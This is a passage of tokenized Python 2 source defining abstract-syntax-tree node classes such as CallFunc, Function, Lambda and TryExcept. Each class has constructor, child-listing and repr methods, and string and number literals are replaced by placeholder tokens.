expr ) , ) <EOL> class Bitand ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Bitor ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Bitxor ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Break ( Node ) : <EOL> def __init__ ( self , lineno = None ) : <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return ( ) <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> class CallFunc ( Node ) : <EOL> def __init__ ( self , node , args , star_args = None , dstar_args = None , lineno = None ) : <EOL> self . node = node <EOL> self . args = args <EOL> self . star_args = star_args <EOL> self . dstar_args = dstar_args <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . 
node ) <EOL> children . extend ( flatten ( self . args ) ) <EOL> children . append ( self . star_args ) <EOL> children . append ( self . dstar_args ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . node ) <EOL> nodelist . extend ( flatten_nodes ( self . args ) ) <EOL> if self . star_args is not None : <EOL> nodelist . append ( self . star_args ) <EOL> if self . dstar_args is not None : <EOL> nodelist . append ( self . dstar_args ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . node ) , repr ( self . args ) , repr ( self . star_args ) , repr ( self . dstar_args ) ) <EOL> class Class ( Node ) : <EOL> def __init__ ( self , name , bases , doc , code , decorators = None , lineno = None ) : <EOL> self . name = name <EOL> self . bases = bases <EOL> self . doc = doc <EOL> self . code = code <EOL> self . decorators = decorators <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . name ) <EOL> children . extend ( flatten ( self . bases ) ) <EOL> children . append ( self . doc ) <EOL> children . append ( self . code ) <EOL> children . append ( self . decorators ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . bases ) ) <EOL> nodelist . append ( self . code ) <EOL> if self . decorators is not None : <EOL> nodelist . append ( self . decorators ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . name ) , repr ( self . bases ) , repr ( self . doc ) , repr ( self . code ) , repr ( self . decorators ) ) <EOL> class Compare ( Node ) : <EOL> def __init__ ( self , expr , ops , lineno = None ) : <EOL> self . expr = expr <EOL> self . ops = ops <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . 
append ( self . expr ) <EOL> children . extend ( flatten ( self . ops ) ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> nodelist . extend ( flatten_nodes ( self . ops ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . ops ) ) <EOL> class Const ( Node ) : <EOL> def __init__ ( self , value , lineno = None ) : <EOL> self . value = value <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . value , <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . value ) , ) <EOL> class Continue ( Node ) : <EOL> def __init__ ( self , lineno = None ) : <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return ( ) <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> class Decorators ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Dict ( Node ) : <EOL> def __init__ ( self , items , lineno = None ) : <EOL> self . items = items <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . items ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . items ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . 
items ) , ) <EOL> class Discard ( Node ) : <EOL> def __init__ ( self , expr , lineno = None ) : <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , ) <EOL> class Div ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class Ellipsis ( Node ) : <EOL> def __init__ ( self , lineno = None ) : <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return ( ) <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> class Exec ( Node ) : <EOL> def __init__ ( self , expr , locals , globals , lineno = None ) : <EOL> self . expr = expr <EOL> self . locals = locals <EOL> self . globals = globals <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . append ( self . locals ) <EOL> children . append ( self . globals ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> if self . locals is not None : <EOL> nodelist . append ( self . locals ) <EOL> if self . globals is not None : <EOL> nodelist . append ( self . globals ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . locals ) , repr ( self . 
globals ) ) <EOL> class FloorDiv ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class For ( Node ) : <EOL> def __init__ ( self , assign , list , body , else_ , lineno = None ) : <EOL> self . assign = assign <EOL> self . list = list <EOL> self . body = body <EOL> self . else_ = else_ <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . assign ) <EOL> children . append ( self . list ) <EOL> children . append ( self . body ) <EOL> children . append ( self . else_ ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . assign ) <EOL> nodelist . append ( self . list ) <EOL> nodelist . append ( self . body ) <EOL> if self . else_ is not None : <EOL> nodelist . append ( self . else_ ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . assign ) , repr ( self . list ) , repr ( self . body ) , repr ( self . else_ ) ) <EOL> class From ( Node ) : <EOL> def __init__ ( self , modname , names , level , lineno = None ) : <EOL> self . modname = modname <EOL> self . names = names <EOL> self . level = level <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . modname , self . names , self . level <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . modname ) , repr ( self . names ) , repr ( self . 
level ) ) <EOL> class Function ( Node ) : <EOL> def __init__ ( self , decorators , name , argnames , defaults , flags , doc , code , lineno = None ) : <EOL> self . decorators = decorators <EOL> self . name = name <EOL> self . argnames = argnames <EOL> self . defaults = defaults <EOL> self . flags = flags <EOL> self . doc = doc <EOL> self . code = code <EOL> self . lineno = lineno <EOL> self . varargs = self . kwargs = None <EOL> if flags & CO_VARARGS : <EOL> self . varargs = <NUM_LIT:1> <EOL> if flags & CO_VARKEYWORDS : <EOL> self . kwargs = <NUM_LIT:1> <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . decorators ) <EOL> children . append ( self . name ) <EOL> children . append ( self . argnames ) <EOL> children . extend ( flatten ( self . defaults ) ) <EOL> children . append ( self . flags ) <EOL> children . append ( self . doc ) <EOL> children . append ( self . code ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> if self . decorators is not None : <EOL> nodelist . append ( self . decorators ) <EOL> nodelist . extend ( flatten_nodes ( self . defaults ) ) <EOL> nodelist . append ( self . code ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . decorators ) , repr ( self . name ) , repr ( self . argnames ) , repr ( self . defaults ) , repr ( self . flags ) , repr ( self . doc ) , repr ( self . code ) ) <EOL> class GenExpr ( Node ) : <EOL> def __init__ ( self , code , lineno = None ) : <EOL> self . code = code <EOL> self . lineno = lineno <EOL> self . argnames = [ '<STR_LIT>' ] <EOL> self . varargs = self . kwargs = None <EOL> def getChildren ( self ) : <EOL> return self . code , <EOL> def getChildNodes ( self ) : <EOL> return self . code , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . 
code ) , ) <EOL> class GenExprFor ( Node ) : <EOL> def __init__ ( self , assign , iter , ifs , lineno = None ) : <EOL> self . assign = assign <EOL> self . iter = iter <EOL> self . ifs = ifs <EOL> self . lineno = lineno <EOL> self . is_outmost = False <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . assign ) <EOL> children . append ( self . iter ) <EOL> children . extend ( flatten ( self . ifs ) ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . assign ) <EOL> nodelist . append ( self . iter ) <EOL> nodelist . extend ( flatten_nodes ( self . ifs ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . assign ) , repr ( self . iter ) , repr ( self . ifs ) ) <EOL> class GenExprIf ( Node ) : <EOL> def __init__ ( self , test , lineno = None ) : <EOL> self . test = test <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . test , <EOL> def getChildNodes ( self ) : <EOL> return self . test , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . test ) , ) <EOL> class GenExprInner ( Node ) : <EOL> def __init__ ( self , expr , quals , lineno = None ) : <EOL> self . expr = expr <EOL> self . quals = quals <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . extend ( flatten ( self . quals ) ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> nodelist . extend ( flatten_nodes ( self . quals ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . quals ) ) <EOL> class Getattr ( Node ) : <EOL> def __init__ ( self , expr , attrname , lineno = None ) : <EOL> self . expr = expr <EOL> self . attrname = attrname <EOL> self . 
lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , self . attrname <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . attrname ) ) <EOL> class Global ( Node ) : <EOL> def __init__ ( self , names , lineno = None ) : <EOL> self . names = names <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . names , <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . names ) , ) <EOL> class If ( Node ) : <EOL> def __init__ ( self , tests , else_ , lineno = None ) : <EOL> self . tests = tests <EOL> self . else_ = else_ <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . extend ( flatten ( self . tests ) ) <EOL> children . append ( self . else_ ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . tests ) ) <EOL> if self . else_ is not None : <EOL> nodelist . append ( self . else_ ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . tests ) , repr ( self . else_ ) ) <EOL> class IfExp ( Node ) : <EOL> def __init__ ( self , test , then , else_ , lineno = None ) : <EOL> self . test = test <EOL> self . then = then <EOL> self . else_ = else_ <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . test , self . then , self . else_ <EOL> def getChildNodes ( self ) : <EOL> return self . test , self . then , self . else_ <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . test ) , repr ( self . then ) , repr ( self . else_ ) ) <EOL> class Import ( Node ) : <EOL> def __init__ ( self , names , lineno = None ) : <EOL> self . names = names <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . 
names , <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . names ) , ) <EOL> class Invert ( Node ) : <EOL> def __init__ ( self , expr , lineno = None ) : <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , ) <EOL> class Keyword ( Node ) : <EOL> def __init__ ( self , name , expr , lineno = None ) : <EOL> self . name = name <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . name , self . expr <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . name ) , repr ( self . expr ) ) <EOL> class Lambda ( Node ) : <EOL> def __init__ ( self , argnames , defaults , flags , code , lineno = None ) : <EOL> self . argnames = argnames <EOL> self . defaults = defaults <EOL> self . flags = flags <EOL> self . code = code <EOL> self . lineno = lineno <EOL> self . varargs = self . kwargs = None <EOL> if flags & CO_VARARGS : <EOL> self . varargs = <NUM_LIT:1> <EOL> if flags & CO_VARKEYWORDS : <EOL> self . kwargs = <NUM_LIT:1> <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . argnames ) <EOL> children . extend ( flatten ( self . defaults ) ) <EOL> children . append ( self . flags ) <EOL> children . append ( self . code ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . defaults ) ) <EOL> nodelist . append ( self . code ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . argnames ) , repr ( self . defaults ) , repr ( self . flags ) , repr ( self . 
code ) ) <EOL> class LeftShift ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class List ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class ListComp ( Node ) : <EOL> def __init__ ( self , expr , quals , lineno = None ) : <EOL> self . expr = expr <EOL> self . quals = quals <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . extend ( flatten ( self . quals ) ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> nodelist . extend ( flatten_nodes ( self . quals ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . quals ) ) <EOL> class ListCompFor ( Node ) : <EOL> def __init__ ( self , assign , list , ifs , lineno = None ) : <EOL> self . assign = assign <EOL> self . list = list <EOL> self . ifs = ifs <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . assign ) <EOL> children . append ( self . list ) <EOL> children . extend ( flatten ( self . 
ifs ) ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . assign ) <EOL> nodelist . append ( self . list ) <EOL> nodelist . extend ( flatten_nodes ( self . ifs ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . assign ) , repr ( self . list ) , repr ( self . ifs ) ) <EOL> class ListCompIf ( Node ) : <EOL> def __init__ ( self , test , lineno = None ) : <EOL> self . test = test <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . test , <EOL> def getChildNodes ( self ) : <EOL> return self . test , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . test ) , ) <EOL> class Mod ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class Module ( Node ) : <EOL> def __init__ ( self , doc , node , lineno = None ) : <EOL> self . doc = doc <EOL> self . node = node <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . doc , self . node <EOL> def getChildNodes ( self ) : <EOL> return self . node , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . doc ) , repr ( self . node ) ) <EOL> class Mul ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . 
right ) ) <EOL> class Name ( Node ) : <EOL> def __init__ ( self , name , lineno = None ) : <EOL> self . name = name <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . name , <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . name ) , ) <EOL> class Not ( Node ) : <EOL> def __init__ ( self , expr , lineno = None ) : <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , ) <EOL> class Or ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Pass ( Node ) : <EOL> def __init__ ( self , lineno = None ) : <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return ( ) <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> class Power ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class Print ( Node ) : <EOL> def __init__ ( self , nodes , dest , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . dest = dest <EOL> self . 
lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . extend ( flatten ( self . nodes ) ) <EOL> children . append ( self . dest ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> if self . dest is not None : <EOL> nodelist . append ( self . dest ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , repr ( self . dest ) ) <EOL> class Printnl ( Node ) : <EOL> def __init__ ( self , nodes , dest , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . dest = dest <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . extend ( flatten ( self . nodes ) ) <EOL> children . append ( self . dest ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> if self . dest is not None : <EOL> nodelist . append ( self . dest ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , repr ( self . dest ) ) <EOL> class Raise ( Node ) : <EOL> def __init__ ( self , expr1 , expr2 , expr3 , lineno = None ) : <EOL> self . expr1 = expr1 <EOL> self . expr2 = expr2 <EOL> self . expr3 = expr3 <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr1 ) <EOL> children . append ( self . expr2 ) <EOL> children . append ( self . expr3 ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> if self . expr1 is not None : <EOL> nodelist . append ( self . expr1 ) <EOL> if self . expr2 is not None : <EOL> nodelist . append ( self . expr2 ) <EOL> if self . expr3 is not None : <EOL> nodelist . append ( self . 
expr3 ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr1 ) , repr ( self . expr2 ) , repr ( self . expr3 ) ) <EOL> class Return ( Node ) : <EOL> def __init__ ( self , value , lineno = None ) : <EOL> self . value = value <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . value , <EOL> def getChildNodes ( self ) : <EOL> return self . value , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . value ) , ) <EOL> class RightShift ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class Slice ( Node ) : <EOL> def __init__ ( self , expr , flags , lower , upper , lineno = None ) : <EOL> self . expr = expr <EOL> self . flags = flags <EOL> self . lower = lower <EOL> self . upper = upper <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . append ( self . flags ) <EOL> children . append ( self . lower ) <EOL> children . append ( self . upper ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> if self . lower is not None : <EOL> nodelist . append ( self . lower ) <EOL> if self . upper is not None : <EOL> nodelist . append ( self . upper ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . flags ) , repr ( self . lower ) , repr ( self . upper ) ) <EOL> class Sliceobj ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . 
nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Stmt ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Sub ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class Subscript ( Node ) : <EOL> def __init__ ( self , expr , flags , subs , lineno = None ) : <EOL> self . expr = expr <EOL> self . flags = flags <EOL> self . subs = subs <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . append ( self . flags ) <EOL> children . extend ( flatten ( self . subs ) ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> nodelist . extend ( flatten_nodes ( self . subs ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . flags ) , repr ( self . 
subs ) ) <EOL> class TryExcept ( Node ) : <EOL> def __init__ ( self , body , handlers , else_ , lineno = None ) : <EOL> self . body = body <EOL> self . handlers = handlers <EOL> self . else_ = else_ <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . body ) <EOL> children . extend ( flatten ( self . handlers ) ) <EOL> children . append ( self . else_ ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . body ) <EOL> nodelist . extend ( flatten_nodes ( self . handlers ) ) <EOL> if self . else_ is not None : <EOL> nodelist . append ( self . else_ ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . body ) , repr ( self . handlers ) , repr ( self . else_ ) ) <EOL> class TryFinally ( Node ) : <EOL> def __init__ ( self , body , final , lineno = None ) : <EOL> self . body = body <EOL> self . final = final <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . body , self . final <EOL> def getChildNodes ( self ) : <EOL> return self . body , self . final <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . body ) , repr ( self . final ) ) <EOL> class Tuple ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes 